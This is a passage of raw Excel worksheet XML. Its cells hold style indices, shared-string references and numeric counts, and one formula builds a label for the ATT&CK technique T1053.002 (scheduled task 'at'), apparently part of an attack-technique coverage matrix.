      </c>
      <c r="AG22" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH22" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI22" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ22" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AK22" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL22" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM22" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN22" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO22" s="359" t="s">
        <v>756</v>
      </c>
      <c r="AP22" s="385" t="str">
        <f>M22&amp;"-frag"</f>
        <v>T1053.002-Scheduled_TaskJob_At-frag</v>
      </c>
      <c r="AQ22" s="358">
        <v>2</v>
      </c>
      <c r="AR22" s="100"/>
      <c r="AS22" s="100">
        <v>1</v>
      </c>
      <c r="AT22" s="100">
        <v>1</v>
      </c>
      <c r="AU22" s="100">
        <v>2</v>
      </c>
      <c r="AV22" s="92" t="s">
        <v>946</v>
      </c>
      <c r="AW22" s="100">
        <v>1</v>
      </c>
      <c r="AX22" s="100">
        <v>1</v>
      </c>
      <c r="AY22" s="100">
        <v>1</v>
      </c>
      <c r="AZ22" s="100">
        <v>2</v>
      </c>
      <c r="BA22" s="381" t="s">
        <v>4876</v>
      </c>
      <c r="BB22" s="101">
        <v>1</v>
      </c>
      <c r="BC22" s="102" t="s">
        <v>1799</v>
      </c>
      <c r="BD22" s="102">
        <v>1</v>
      </c>
      <c r="BE22" s="103" t="s">
        <v>1800</v>
      </c>
      <c r="BF22" s="103">
        <v>1</v>
      </c>
      <c r="BG22" s="104">
        <v>1</v>
      </c>
      <c r="BH22" s="105">
        <v>14</v>
      </c>
      <c r="BI22" s="106" t="s">
        <v>2814</v>
      </c>
      <c r="BJ22" s="497">
        <v>4</v>
      </c>
      <c r="BK22" s="107" t="s">
        <v>2815</v>
      </c>
      <c r="BL22" s="107">
        <v>4</v>
      </c>
      <c r="BM22" s="108">
        <v>2</v>
      </c>
      <c r="BN22" s="109">
        <v>15</v>
      </c>
      <c r="BO22" s="110" t="s">
        <v>1994</v>
      </c>
      <c r="BP22" s="501">
        <v>5</v>
      </c>
      <c r="BQ22" s="111" t="s">
        <v>1995</v>
      </c>
      <c r="BR22" s="111">
        <v>5</v>
      </c>
      <c r="BS22" s="112">
        <v>2</v>
      </c>
      <c r="BT22" s="113">
        <v>25</v>
      </c>
      <c r="BU22" s="114" t="s">
        <v>2816</v>
      </c>
      <c r="BV22" s="503">
        <v>8</v>
      </c>
      <c r="BW22" s="115" t="s">
        <v>2817</v>
      </c>
      <c r="BX22" s="115">
        <v>7</v>
      </c>
      <c r="BY22" s="116">
        <v>2</v>
      </c>
      <c r="BZ22" s="250">
        <v>52</v>
      </c>
      <c r="CA22" s="251" t="s">
        <v>2818</v>
      </c>
      <c r="CB22" s="505">
        <v>15</v>
      </c>
      <c r="CC22" s="252" t="s">
        <v>2819</v>
      </c>
      <c r="CD22" s="252">
        <v>12</v>
      </c>
      <c r="CE22" s="253">
        <v>2</v>
      </c>
      <c r="CF22" s="101">
        <v>77</v>
      </c>
      <c r="CG22" s="102" t="s">
        <v>2082</v>
      </c>
      <c r="CH22" s="102">
        <v>23</v>
      </c>
      <c r="CI22" s="103" t="s">
        <v>2083</v>
      </c>
      <c r="CJ22" s="103">
        <v>19</v>
      </c>
      <c r="CK22" s="104">
        <v>2</v>
      </c>
      <c r="CL22" s="105">
        <v>0</v>
      </c>
      <c r="CM22" s="106">
        <v>0</v>
      </c>
      <c r="CN22" s="497">
        <v>0</v>
      </c>
      <c r="CO22" s="107">
        <v>0</v>
      </c>
      <c r="CP22" s="107">
        <v>0</v>
      </c>
      <c r="CQ22" s="108">
        <v>0</v>
      </c>
      <c r="CR22" s="109">
        <v>5</v>
      </c>
      <c r="CS22" s="110" t="s">
        <v>2820</v>
      </c>
      <c r="CT22" s="501">
        <v>3</v>
      </c>
      <c r="CU22" s="111" t="s">
        <v>2821</v>
      </c>
      <c r="CV22" s="111">
        <v>3</v>
      </c>
      <c r="CW22" s="112">
        <v>1</v>
      </c>
      <c r="CX22" s="113">
        <v>20</v>
      </c>
      <c r="CY22" s="114" t="s">
        <v>2139</v>
      </c>
      <c r="CZ22" s="503">
        <v>8</v>
      </c>
      <c r="DA22" s="115" t="s">
        <v>2140</v>
      </c>
      <c r="DB22" s="115">
        <v>8</v>
      </c>
      <c r="DC22" s="116">
        <v>2</v>
      </c>
      <c r="DD22" s="101">
        <v>0</v>
      </c>
      <c r="DE22" s="102">
        <v>0</v>
      </c>
      <c r="DF22" s="102">
        <v>0</v>
      </c>
      <c r="DG22" s="103">
        <v>0</v>
      </c>
      <c r="DH22" s="103">
        <v>0</v>
      </c>
      <c r="DI22" s="104">
        <v>0</v>
      </c>
      <c r="DJ22" s="105">
        <v>12</v>
      </c>
      <c r="DK22" s="106" t="s">
        <v>2822</v>
      </c>
      <c r="DL22" s="497">
        <v>2</v>
      </c>
      <c r="DM22" s="107" t="s">
        <v>2823</v>
      </c>
      <c r="DN22" s="107">
        <v>2</v>
      </c>
      <c r="DO22" s="108">
        <v>2</v>
      </c>
      <c r="DP22" s="109">
        <v>12</v>
      </c>
      <c r="DQ22" s="110" t="s">
        <v>2822</v>
      </c>
      <c r="DR22" s="501">
        <v>2</v>
      </c>
      <c r="DS22" s="111" t="s">
        <v>2823</v>
      </c>
      <c r="DT22" s="111">
        <v>2</v>
      </c>
      <c r="DU22" s="112">
        <v>2</v>
      </c>
      <c r="DV22" s="113">
        <v>23</v>
      </c>
      <c r="DW22" s="114" t="s">
        <v>2824</v>
      </c>
      <c r="DX22" s="503">
        <v>6</v>
      </c>
      <c r="DY22" s="115" t="s">
        <v>2825</v>
      </c>
      <c r="DZ22" s="115">
        <v>5</v>
      </c>
      <c r="EA22" s="116">
        <v>2</v>
      </c>
      <c r="EB22" s="250">
        <v>26</v>
      </c>
      <c r="EC22" s="251" t="s">
        <v>2826</v>
      </c>
      <c r="ED22" s="505">
        <v>5</v>
      </c>
      <c r="EE22" s="252" t="s">
        <v>2827</v>
      </c>
      <c r="EF22" s="252">
        <v>4</v>
      </c>
      <c r="EG22" s="253">
        <v>2</v>
      </c>
      <c r="EH22" s="101">
        <v>49</v>
      </c>
      <c r="EI22" s="102" t="s">
        <v>2828</v>
      </c>
      <c r="EJ22" s="102">
        <v>11</v>
      </c>
      <c r="EK22" s="103" t="s">
        <v>2829</v>
      </c>
      <c r="EL22" s="103">
        <v>9</v>
      </c>
      <c r="EM22" s="104">
        <v>2</v>
      </c>
      <c r="EN22" s="105">
        <v>0</v>
      </c>
      <c r="EO22" s="106">
        <v>0</v>
      </c>
      <c r="EP22" s="497">
        <v>0</v>
      </c>
      <c r="EQ22" s="107">
        <v>0</v>
      </c>
      <c r="ER22" s="107">
        <v>0</v>
      </c>
      <c r="ES22" s="108">
        <v>0</v>
      </c>
      <c r="ET22" s="109">
        <v>4</v>
      </c>
      <c r="EU22" s="110" t="s">
        <v>2830</v>
      </c>
      <c r="EV22" s="501">
        <v>2</v>
      </c>
      <c r="EW22" s="111" t="s">
        <v>2831</v>
      </c>
      <c r="EX22" s="111">
        <v>2</v>
      </c>
      <c r="EY22" s="112">
        <v>1</v>
      </c>
      <c r="EZ22" s="113">
        <v>16</v>
      </c>
      <c r="FA22" s="114" t="s">
        <v>2832</v>
      </c>
      <c r="FB22" s="503">
        <v>4</v>
      </c>
      <c r="FC22" s="115" t="s">
        <v>2833</v>
      </c>
      <c r="FD22" s="115">
        <v>4</v>
      </c>
      <c r="FE22" s="116">
        <v>2</v>
      </c>
      <c r="FF22" s="101">
        <v>0</v>
      </c>
      <c r="FG22" s="102">
        <v>0</v>
      </c>
      <c r="FH22" s="102">
        <v>0</v>
      </c>
      <c r="FI22" s="103">
        <v>0</v>
      </c>
      <c r="FJ22" s="103">
        <v>0</v>
      </c>
      <c r="FK22" s="104">
        <v>0</v>
      </c>
      <c r="FL22" s="105">
        <v>2</v>
      </c>
      <c r="FM22" s="106" t="s">
        <v>1855</v>
      </c>
      <c r="FN22" s="497">
        <v>2</v>
      </c>
      <c r="FO22" s="107" t="s">
        <v>1856</v>
      </c>
      <c r="FP22" s="107">
        <v>2</v>
      </c>
      <c r="FQ22" s="108">
        <v>1</v>
      </c>
      <c r="FR22" s="109">
        <v>2</v>
      </c>
      <c r="FS22" s="110" t="s">
        <v>1855</v>
      </c>
      <c r="FT22" s="501">
        <v>2</v>
      </c>
      <c r="FU22" s="111" t="s">
        <v>1856</v>
      </c>
      <c r="FV22" s="111">
        <v>2</v>
      </c>
      <c r="FW22" s="112">
        <v>1</v>
      </c>
      <c r="FX22" s="113">
        <v>1</v>
      </c>
      <c r="FY22" s="114" t="s">
        <v>1960</v>
      </c>
      <c r="FZ22" s="503">
        <v>1</v>
      </c>
      <c r="GA22" s="115" t="s">
        <v>1961</v>
      </c>
      <c r="GB22" s="115">
        <v>1</v>
      </c>
      <c r="GC22" s="116">
        <v>1</v>
      </c>
      <c r="GD22" s="250">
        <v>12</v>
      </c>
      <c r="GE22" s="251" t="s">
        <v>2834</v>
      </c>
      <c r="GF22" s="505">
        <v>8</v>
      </c>
      <c r="GG22" s="252" t="s">
        <v>2835</v>
      </c>
      <c r="GH22" s="252">
        <v>6</v>
      </c>
      <c r="GI22" s="253">
        <v>2</v>
      </c>
      <c r="GJ22" s="101">
        <v>13</v>
      </c>
      <c r="GK22" s="102" t="s">
        <v>2836</v>
      </c>
      <c r="GL22" s="102">
        <v>9</v>
      </c>
      <c r="GM22" s="103" t="s">
        <v>2837</v>
      </c>
      <c r="GN22" s="103">
        <v>7</v>
      </c>
      <c r="GO22" s="104">
        <v>2</v>
      </c>
      <c r="GP22" s="105">
        <v>0</v>
      </c>
      <c r="GQ22" s="106">
        <v>0</v>
      </c>
      <c r="GR22" s="497">
        <v>0</v>
      </c>
      <c r="GS22" s="107">
        <v>0</v>
      </c>
      <c r="GT22" s="107">
        <v>0</v>
      </c>
      <c r="GU22" s="108">
        <v>0</v>
      </c>
      <c r="GV22" s="109">
        <v>1</v>
      </c>
      <c r="GW22" s="110" t="s">
        <v>1960</v>
      </c>
      <c r="GX22" s="501">
        <v>1</v>
      </c>
      <c r="GY22" s="111" t="s">
        <v>1961</v>
      </c>
      <c r="GZ22" s="111">
        <v>1</v>
      </c>
      <c r="HA22" s="112">
        <v>1</v>
      </c>
      <c r="HB22" s="113">
        <v>3</v>
      </c>
      <c r="HC22" s="114" t="s">
        <v>2838</v>
      </c>
      <c r="HD22" s="503">
        <v>3</v>
      </c>
      <c r="HE22" s="115" t="s">
        <v>2839</v>
      </c>
      <c r="HF22" s="115">
        <v>3</v>
      </c>
      <c r="HG22" s="116">
        <v>1</v>
      </c>
      <c r="HH22" s="101">
        <v>1</v>
      </c>
      <c r="HI22" s="102" t="s">
        <v>1799</v>
      </c>
      <c r="HJ22" s="102">
        <v>1</v>
      </c>
      <c r="HK22" s="103" t="s">
        <v>1800</v>
      </c>
      <c r="HL22" s="103">
        <v>1</v>
      </c>
      <c r="HM22" s="104">
        <v>1</v>
      </c>
      <c r="HN22" s="105">
        <v>0</v>
      </c>
      <c r="HO22" s="106">
        <v>0</v>
      </c>
      <c r="HP22" s="497">
        <v>0</v>
      </c>
      <c r="HQ22" s="107">
        <v>0</v>
      </c>
      <c r="HR22" s="107">
        <v>0</v>
      </c>
      <c r="HS22" s="108">
        <v>0</v>
      </c>
      <c r="HT22" s="109">
        <v>1</v>
      </c>
      <c r="HU22" s="110" t="s">
        <v>1799</v>
      </c>
      <c r="HV22" s="501">
        <v>1</v>
      </c>
      <c r="HW22" s="111" t="s">
        <v>1800</v>
      </c>
      <c r="HX22" s="111">
        <v>1</v>
      </c>
      <c r="HY22" s="112">
        <v>1</v>
      </c>
      <c r="HZ22" s="113">
        <v>1</v>
      </c>
      <c r="IA22" s="114" t="s">
        <v>1799</v>
      </c>
      <c r="IB22" s="503">
        <v>1</v>
      </c>
      <c r="IC22" s="115" t="s">
        <v>1800</v>
      </c>
      <c r="ID22" s="115">
        <v>1</v>
      </c>
      <c r="IE22" s="116">
        <v>1</v>
      </c>
      <c r="IF22" s="250">
        <v>14</v>
      </c>
      <c r="IG22" s="251" t="s">
        <v>2840</v>
      </c>
      <c r="IH22" s="505">
        <v>2</v>
      </c>
      <c r="II22" s="252" t="s">
        <v>2635</v>
      </c>
      <c r="IJ22" s="252">
        <v>2</v>
      </c>
      <c r="IK22" s="253">
        <v>1</v>
      </c>
      <c r="IL22" s="101">
        <v>15</v>
      </c>
      <c r="IM22" s="102" t="s">
        <v>2841</v>
      </c>
      <c r="IN22" s="102">
        <v>3</v>
      </c>
      <c r="IO22" s="103" t="s">
        <v>2842</v>
      </c>
      <c r="IP22" s="103">
        <v>3</v>
      </c>
      <c r="IQ22" s="104">
        <v>2</v>
      </c>
      <c r="IR22" s="105">
        <v>0</v>
      </c>
      <c r="IS22" s="106">
        <v>0</v>
      </c>
      <c r="IT22" s="497">
        <v>0</v>
      </c>
      <c r="IU22" s="107">
        <v>0</v>
      </c>
      <c r="IV22" s="107">
        <v>0</v>
      </c>
      <c r="IW22" s="108">
        <v>0</v>
      </c>
      <c r="IX22" s="109">
        <v>0</v>
      </c>
      <c r="IY22" s="110">
        <v>0</v>
      </c>
      <c r="IZ22" s="501">
        <v>0</v>
      </c>
      <c r="JA22" s="111">
        <v>0</v>
      </c>
      <c r="JB22" s="111">
        <v>0</v>
      </c>
      <c r="JC22" s="112">
        <v>0</v>
      </c>
      <c r="JD22" s="113">
        <v>1</v>
      </c>
      <c r="JE22" s="114" t="s">
        <v>1799</v>
      </c>
      <c r="JF22" s="503">
        <v>1</v>
      </c>
      <c r="JG22" s="115" t="s">
        <v>1800</v>
      </c>
      <c r="JH22" s="115">
        <v>1</v>
      </c>
      <c r="JI22" s="116">
        <v>1</v>
      </c>
      <c r="JJ22" s="101">
        <v>0</v>
      </c>
      <c r="JK22" s="102">
        <v>0</v>
      </c>
      <c r="JL22" s="102">
        <v>0</v>
      </c>
      <c r="JM22" s="103">
        <v>0</v>
      </c>
      <c r="JN22" s="103">
        <v>0</v>
      </c>
      <c r="JO22" s="104">
        <v>0</v>
      </c>
      <c r="JP22" s="105">
        <v>0</v>
      </c>
      <c r="JQ22" s="106">
        <v>0</v>
      </c>
      <c r="JR22" s="497">
        <v>0</v>
      </c>
      <c r="JS22" s="107">
        <v>0</v>
      </c>
      <c r="JT22" s="107">
        <v>0</v>
      </c>
      <c r="JU22" s="108">
        <v>0</v>
      </c>
      <c r="JV22" s="109">
        <v>0</v>
      </c>
      <c r="JW22" s="110">
        <v>0</v>
      </c>
      <c r="JX22" s="501">
        <v>0</v>
      </c>
      <c r="JY22" s="111">
        <v>0</v>
      </c>
      <c r="JZ22" s="111">
        <v>0</v>
      </c>
      <c r="KA22" s="112">
        <v>0</v>
      </c>
      <c r="KB22" s="113">
        <v>0</v>
      </c>
      <c r="KC22" s="114">
        <v>0</v>
      </c>
      <c r="KD22" s="503">
        <v>0</v>
      </c>
      <c r="KE22" s="115">
        <v>0</v>
      </c>
      <c r="KF22" s="115">
        <v>0</v>
      </c>
      <c r="KG22" s="116">
        <v>0</v>
      </c>
      <c r="KH22" s="250">
        <v>0</v>
      </c>
      <c r="KI22" s="251">
        <v>0</v>
      </c>
      <c r="KJ22" s="505">
        <v>0</v>
      </c>
      <c r="KK22" s="252">
        <v>0</v>
      </c>
      <c r="KL22" s="252">
        <v>0</v>
      </c>
      <c r="KM22" s="253">
        <v>0</v>
      </c>
      <c r="KN22" s="101">
        <v>0</v>
      </c>
      <c r="KO22" s="102">
        <v>0</v>
      </c>
      <c r="KP22" s="102">
        <v>0</v>
      </c>
      <c r="KQ22" s="103">
        <v>0</v>
      </c>
      <c r="KR22" s="103">
        <v>0</v>
      </c>
      <c r="KS22" s="104">
        <v>0</v>
      </c>
      <c r="KT22" s="105">
        <v>0</v>
      </c>
      <c r="KU22" s="106">
        <v>0</v>
      </c>
      <c r="KV22" s="497">
        <v>0</v>
      </c>
      <c r="KW22" s="107">
        <v>0</v>
      </c>
      <c r="KX22" s="107">
        <v>0</v>
      </c>
      <c r="KY22" s="108">
        <v>0</v>
      </c>
      <c r="KZ22" s="109">
        <v>0</v>
      </c>
      <c r="LA22" s="110">
        <v>0</v>
      </c>
      <c r="LB22" s="501">
        <v>0</v>
      </c>
      <c r="LC22" s="111">
        <v>0</v>
      </c>
      <c r="LD22" s="111">
        <v>0</v>
      </c>
      <c r="LE22" s="112">
        <v>0</v>
      </c>
      <c r="LF22" s="113">
        <v>0</v>
      </c>
      <c r="LG22" s="114">
        <v>0</v>
      </c>
      <c r="LH22" s="503">
        <v>0</v>
      </c>
      <c r="LI22" s="115">
        <v>0</v>
      </c>
      <c r="LJ22" s="115">
        <v>0</v>
      </c>
      <c r="LK22" s="116">
        <v>0</v>
      </c>
      <c r="LL22" s="117">
        <v>6</v>
      </c>
      <c r="LM22" s="507">
        <v>5</v>
      </c>
      <c r="LN22" s="119">
        <v>2</v>
      </c>
      <c r="LO22" s="119">
        <v>1</v>
      </c>
      <c r="LP22" s="119">
        <v>3</v>
      </c>
      <c r="LQ22" s="119">
        <v>3</v>
      </c>
      <c r="LR22" s="119">
        <v>2</v>
      </c>
      <c r="LS22" s="119">
        <v>3</v>
      </c>
      <c r="LT22" s="382"/>
      <c r="LU22" s="117">
        <v>0</v>
      </c>
      <c r="LV22" s="118">
        <v>0</v>
      </c>
      <c r="LW22" s="507">
        <v>0</v>
      </c>
      <c r="LX22" s="119">
        <v>0</v>
      </c>
      <c r="LY22" s="119">
        <v>0</v>
      </c>
      <c r="LZ22" s="119">
        <v>0</v>
      </c>
      <c r="MA22" s="117">
        <v>0</v>
      </c>
      <c r="MB22" s="118">
        <v>0</v>
      </c>
      <c r="MC22" s="507">
        <v>0</v>
      </c>
      <c r="MD22" s="119">
        <v>0</v>
      </c>
      <c r="ME22" s="119">
        <v>0</v>
      </c>
      <c r="MF22" s="119">
        <v>0</v>
      </c>
      <c r="MG22" s="117">
        <v>0</v>
      </c>
      <c r="MH22" s="118">
        <v>0</v>
      </c>
      <c r="MI22" s="507">
        <v>0</v>
      </c>
      <c r="MJ22" s="119">
        <v>0</v>
      </c>
      <c r="MK22" s="119">
        <v>0</v>
      </c>
      <c r="ML22" s="119">
        <v>0</v>
      </c>
      <c r="MM22" s="117">
        <v>2</v>
      </c>
      <c r="MN22" s="118" t="s">
        <v>4184</v>
      </c>
      <c r="MO22" s="507">
        <v>1</v>
      </c>
      <c r="MP22" s="119" t="s">
        <v>2843</v>
      </c>
      <c r="MQ22" s="119">
        <v>1</v>
      </c>
      <c r="MR22" s="119">
        <v>1</v>
      </c>
      <c r="MS22" s="117">
        <v>2</v>
      </c>
      <c r="MT22" s="118" t="s">
        <v>4181</v>
      </c>
      <c r="MU22" s="507">
        <v>2</v>
      </c>
      <c r="MV22" s="119" t="s">
        <v>2789</v>
      </c>
      <c r="MW22" s="119">
        <v>1</v>
      </c>
      <c r="MX22" s="119">
        <v>2</v>
      </c>
      <c r="MY22" s="117">
        <v>0</v>
      </c>
      <c r="MZ22" s="118">
        <v>0</v>
      </c>
      <c r="NA22" s="507">
        <v>0</v>
      </c>
      <c r="NB22" s="119">
        <v>0</v>
      </c>
      <c r="NC22" s="119">
        <v>0</v>
      </c>
      <c r="ND22" s="119">
        <v>0</v>
      </c>
      <c r="NE22" s="117">
        <v>0</v>
      </c>
      <c r="NF22" s="118">
        <v>0</v>
      </c>
      <c r="NG22" s="507">
        <v>0</v>
      </c>
      <c r="NH22" s="119">
        <v>0</v>
      </c>
      <c r="NI22" s="119">
        <v>0</v>
      </c>
      <c r="NJ22" s="119">
        <v>0</v>
      </c>
      <c r="NK22" s="117">
        <v>2</v>
      </c>
      <c r="NL22" s="118" t="s">
        <v>4191</v>
      </c>
      <c r="NM22" s="507">
        <v>2</v>
      </c>
      <c r="NN22" s="119" t="s">
        <v>2638</v>
      </c>
      <c r="NO22" s="119">
        <v>1</v>
      </c>
      <c r="NP22" s="119">
        <v>2</v>
      </c>
      <c r="NQ22" s="117">
        <v>0</v>
      </c>
      <c r="NR22" s="118">
        <v>0</v>
      </c>
      <c r="NS22" s="507">
        <v>0</v>
      </c>
      <c r="NT22" s="119">
        <v>0</v>
      </c>
      <c r="NU22" s="119">
        <v>0</v>
      </c>
      <c r="NV22" s="119">
        <v>0</v>
      </c>
      <c r="NW22" s="117">
        <v>0</v>
      </c>
      <c r="NX22" s="118">
        <v>0</v>
      </c>
      <c r="NY22" s="507">
        <v>0</v>
      </c>
      <c r="NZ22" s="119">
        <v>0</v>
      </c>
      <c r="OA22" s="119">
        <v>0</v>
      </c>
      <c r="OB22" s="119">
        <v>0</v>
      </c>
      <c r="OC22" s="120">
        <v>12</v>
      </c>
      <c r="OD22" s="120">
        <v>2</v>
      </c>
      <c r="OE22" s="120">
        <v>2</v>
      </c>
      <c r="OF22" s="121">
        <v>1</v>
      </c>
      <c r="OG22" s="120">
        <v>1</v>
      </c>
      <c r="OH22" s="120">
        <v>1</v>
      </c>
      <c r="OI22" s="120">
        <v>1</v>
      </c>
      <c r="OJ22" s="120">
        <v>1</v>
      </c>
      <c r="OK22" s="383"/>
      <c r="OL22" s="120">
        <v>11</v>
      </c>
      <c r="OM22" s="120">
        <v>11</v>
      </c>
      <c r="ON22" s="120">
        <v>1</v>
      </c>
      <c r="OO22" s="193" t="s">
        <v>2844</v>
      </c>
      <c r="OP22" s="193">
        <v>1</v>
      </c>
      <c r="OQ22" s="464">
        <v>1</v>
      </c>
      <c r="OR22" s="120">
        <v>0</v>
      </c>
      <c r="OS22" s="120">
        <v>0</v>
      </c>
      <c r="OT22" s="120">
        <v>0</v>
      </c>
      <c r="OU22" s="193"/>
      <c r="OV22" s="193">
        <v>0</v>
      </c>
      <c r="OW22" s="464">
        <v>0</v>
      </c>
      <c r="OX22" s="120">
        <v>0</v>
      </c>
      <c r="OY22" s="120">
        <v>0</v>
      </c>
      <c r="OZ22" s="120">
        <v>0</v>
      </c>
      <c r="PA22" s="193"/>
      <c r="PB22" s="193">
        <v>0</v>
      </c>
      <c r="PC22" s="464">
        <v>0</v>
      </c>
      <c r="PD22" s="120">
        <v>0</v>
      </c>
      <c r="PE22" s="120">
        <v>0</v>
      </c>
      <c r="PF22" s="120">
        <v>0</v>
      </c>
      <c r="PG22" s="193"/>
      <c r="PH22" s="193">
        <v>0</v>
      </c>
      <c r="PI22" s="464">
        <v>0</v>
      </c>
      <c r="PJ22" s="120">
        <v>1</v>
      </c>
      <c r="PK22" s="120">
        <v>1</v>
      </c>
      <c r="PL22" s="120">
        <v>1</v>
      </c>
      <c r="PM22" s="193" t="s">
        <v>2845</v>
      </c>
      <c r="PN22" s="193">
        <v>1</v>
      </c>
      <c r="PO22" s="464">
        <v>1</v>
      </c>
      <c r="PP22" s="120">
        <v>0</v>
      </c>
      <c r="PQ22" s="120">
        <v>0</v>
      </c>
      <c r="PR22" s="120">
        <v>0</v>
      </c>
      <c r="PS22" s="193"/>
      <c r="PT22" s="193">
        <v>0</v>
      </c>
      <c r="PU22" s="464">
        <v>0</v>
      </c>
      <c r="PV22" s="120">
        <v>0</v>
      </c>
      <c r="PW22" s="120">
        <v>0</v>
      </c>
      <c r="PX22" s="120">
        <v>0</v>
      </c>
      <c r="PY22" s="193"/>
      <c r="PZ22" s="193">
        <v>0</v>
      </c>
      <c r="QA22" s="464">
        <v>0</v>
      </c>
      <c r="QB22" s="120">
        <v>0</v>
      </c>
      <c r="QC22" s="120">
        <v>0</v>
      </c>
      <c r="QD22" s="120">
        <v>0</v>
      </c>
      <c r="QE22" s="193"/>
      <c r="QF22" s="193">
        <v>0</v>
      </c>
      <c r="QG22" s="464">
        <v>0</v>
      </c>
      <c r="QH22" s="120">
        <v>12</v>
      </c>
      <c r="QI22" s="120">
        <v>12</v>
      </c>
      <c r="QJ22" s="120">
        <v>1</v>
      </c>
      <c r="QK22" s="193" t="s">
        <v>2542</v>
      </c>
      <c r="QL22" s="193">
        <v>1</v>
      </c>
      <c r="QM22" s="464">
        <v>1</v>
      </c>
      <c r="QN22" s="120">
        <v>0</v>
      </c>
      <c r="QO22" s="120">
        <v>0</v>
      </c>
      <c r="QP22" s="120">
        <v>0</v>
      </c>
      <c r="QQ22" s="193"/>
      <c r="QR22" s="193">
        <v>0</v>
      </c>
      <c r="QS22" s="464">
        <v>0</v>
      </c>
      <c r="QT22" s="184"/>
      <c r="QU22" s="184"/>
      <c r="QV22" s="184"/>
      <c r="QW22" s="184"/>
      <c r="QX22" s="184"/>
      <c r="QY22" s="184"/>
      <c r="QZ22" s="184"/>
      <c r="RA22" s="184"/>
      <c r="RB22" s="184"/>
      <c r="RC22" s="184"/>
      <c r="RD22" s="184"/>
      <c r="RE22" s="184"/>
      <c r="RF22" s="184"/>
      <c r="RG22" s="184"/>
      <c r="RH22" s="184"/>
      <c r="RI22" s="184"/>
      <c r="RJ22" s="184"/>
      <c r="RK22" s="184"/>
      <c r="RL22" s="184"/>
      <c r="RM22" s="184"/>
      <c r="RN22" s="184"/>
      <c r="RO22" s="184"/>
      <c r="RP22" s="184"/>
      <c r="RQ22" s="184"/>
      <c r="RR22" s="184"/>
      <c r="RS22" s="184"/>
      <c r="RT22" s="184"/>
      <c r="RU22" s="184"/>
      <c r="RV22" s="184"/>
      <c r="RW22" s="184"/>
      <c r="RX22" s="184"/>
      <c r="RY22" s="184"/>
      <c r="RZ22" s="184"/>
      <c r="SA22" s="184"/>
      <c r="SB22" s="184"/>
      <c r="SC22" s="184"/>
      <c r="SD22" s="184"/>
      <c r="SE22" s="184"/>
      <c r="SF22" s="184"/>
      <c r="SG22" s="184"/>
      <c r="SH22" s="184"/>
      <c r="SI22" s="184"/>
      <c r="SJ22" s="184"/>
      <c r="SK22" s="184"/>
      <c r="SL22" s="184"/>
      <c r="SM22" s="184"/>
      <c r="SN22" s="184"/>
      <c r="SO22" s="184"/>
      <c r="SP22" s="184"/>
      <c r="SQ22" s="184"/>
      <c r="SR22" s="184"/>
      <c r="SS22" s="184"/>
      <c r="ST22" s="184"/>
      <c r="SU22" s="184"/>
      <c r="SV22" s="184"/>
      <c r="SW22" s="184"/>
      <c r="SX22" s="184"/>
      <c r="SY22" s="184"/>
      <c r="SZ22" s="184"/>
      <c r="TA22" s="184"/>
      <c r="TB22" s="184"/>
      <c r="TC22" s="184"/>
      <c r="TD22" s="184"/>
      <c r="TE22" s="184"/>
      <c r="TF22" s="184"/>
      <c r="TG22" s="184"/>
      <c r="TH22" s="184"/>
      <c r="TI22" s="184"/>
      <c r="TJ22" s="184"/>
      <c r="TK22" s="184"/>
      <c r="TL22" s="184"/>
      <c r="TM22" s="184"/>
      <c r="TN22" s="184"/>
      <c r="TO22" s="184"/>
      <c r="TP22" s="184"/>
      <c r="TQ22" s="184"/>
      <c r="TR22" s="184"/>
      <c r="TS22" s="184"/>
      <c r="TT22" s="184"/>
      <c r="TU22" s="184"/>
      <c r="TV22" s="184"/>
      <c r="TW22" s="184"/>
      <c r="TX22" s="184"/>
      <c r="TY22" s="184"/>
      <c r="TZ22" s="184"/>
      <c r="UA22" s="184"/>
      <c r="UB22" s="184"/>
      <c r="UC22" s="184"/>
      <c r="UD22" s="184"/>
      <c r="UE22" s="184"/>
      <c r="UF22" s="184"/>
      <c r="UG22" s="184"/>
      <c r="UH22" s="184"/>
      <c r="UI22" s="184"/>
      <c r="UJ22" s="184"/>
      <c r="UK22" s="184"/>
      <c r="UL22" s="184"/>
      <c r="UM22" s="184"/>
      <c r="UN22" s="184"/>
      <c r="UO22" s="184"/>
      <c r="UP22" s="184"/>
      <c r="UQ22" s="184"/>
      <c r="UR22" s="184"/>
      <c r="US22" s="184"/>
      <c r="UT22" s="184"/>
      <c r="UU22" s="184"/>
      <c r="UV22" s="184"/>
      <c r="UW22" s="184"/>
      <c r="UX22" s="184"/>
      <c r="UY22" s="184"/>
      <c r="UZ22" s="184"/>
      <c r="VA22" s="184"/>
      <c r="VB22" s="184"/>
      <c r="VC22" s="184"/>
      <c r="VD22" s="184"/>
      <c r="VE22" s="184"/>
      <c r="VF22" s="184"/>
      <c r="VG22" s="184"/>
      <c r="VH22" s="184"/>
      <c r="VI22" s="184"/>
      <c r="VJ22" s="184"/>
      <c r="VK22" s="184"/>
      <c r="VL22" s="184"/>
      <c r="VM22" s="184"/>
      <c r="VN22" s="184"/>
      <c r="VO22" s="184"/>
      <c r="VP22" s="184"/>
      <c r="VQ22" s="184"/>
      <c r="VR22" s="184"/>
      <c r="VS22" s="184"/>
      <c r="VT22" s="184"/>
      <c r="VU22" s="184"/>
      <c r="VV22" s="184"/>
      <c r="VW22" s="184"/>
      <c r="VX22" s="184"/>
      <c r="VY22" s="184"/>
    </row>
    <row r="23" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A23" s="82" t="s">
        <v>47</v>
      </c>
      <c r="B23" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C23" s="83" t="s">
        <v>312</v>
      </c>
      <c r="D23" s="83" t="s">
        <v>48</v>
      </c>
      <c r="E23" s="83">
        <f t="shared" si="2"/>
        <v>17</v>
      </c>
      <c r="F23" s="83" t="s">
        <v>49</v>
      </c>
      <c r="G23" s="83" t="s">
        <v>947</v>
      </c>
      <c r="H23" s="83" t="s">
        <v>948</v>
      </c>
      <c r="I23" s="81" t="s">
        <v>949</v>
      </c>
      <c r="J23" s="85" t="s">
        <v>782</v>
      </c>
      <c r="K23" s="81" t="s">
        <v>862</v>
      </c>
      <c r="L23" s="81" t="s">
        <v>950</v>
      </c>
      <c r="M23" s="378" t="s">
        <v>197</v>
